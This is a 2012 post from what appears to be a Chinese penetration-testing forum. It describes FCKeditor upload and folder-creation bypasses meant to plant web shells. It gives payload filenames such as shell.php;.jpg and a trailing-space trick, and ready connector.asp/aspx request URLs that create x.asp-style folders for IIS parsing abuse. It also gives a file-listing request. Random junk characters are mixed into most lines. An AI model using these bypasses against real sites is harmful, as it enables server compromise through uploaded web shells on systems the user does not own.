中国网络渗透测试联盟

标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破 [打印本页]
作者: admin    时间: 2012-12-31 09:27
标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg0 k; m8 L1 I$ J, c3 A
, h/ y; |* N+ I- T+ K
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。- [6 N$ T  m  B3 `) l# Y' `
6 p& |4 B. U7 l* C2 l3 W
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。6 j& c) |: \4 r8 i

# `3 h' V' y& q6 Y9 ?突破建立文件夹:
6 B, u/ n' n, A  l- z9 R; t
; x2 W1 |' |2 n  ]# y+ r3 Zeditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp3 t: B1 {0 q1 Q, E

* A. W% E) X# ~% q" X; l参数:
1 u6 l& L) ?  B+ K. I$ o% |% c5 |% G
当前目录名:CurrentFolder=/qing.asp
+ s4 M- P2 n5 Q* g8 F/ A( B3 V! j& X# ^
新的目录名:NewFolderName=x.asp
3 t  E1 k4 @+ ]& a% G1 }3 l9 D8 o9 X% R3 i7 x/ s0 ], O
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……# Z5 [" r9 O1 t: q4 Z0 Y" ^

8 W# U$ p$ B# [4 Y" e0 a7 u6 m3 Q那么 x.asp 就已经建立生成了,此方法百试百灵!- F0 ^. @* X$ v* k, V8 p

: ~  g. D+ U% O+ o3 b. b新建文件夹参数 x.asp,基本都能搞定。2 f6 ]! w# O4 _  d9 k/ z$ t
1 o" Y6 L0 n, G( @" t- v
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建6 W# a+ H) ^6 H+ @9 @- S

6 K4 o( h' Z* J" X/ `8 caspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
5 O% c8 A$ W. {: _; C: P
2 J2 I( I1 p( o' k' X8 k获取文件列表
  z, v* P0 {% v       aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
' O* E  b: p' L  T
+ Q" u4 e5 P8 Y& |4 _. F



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2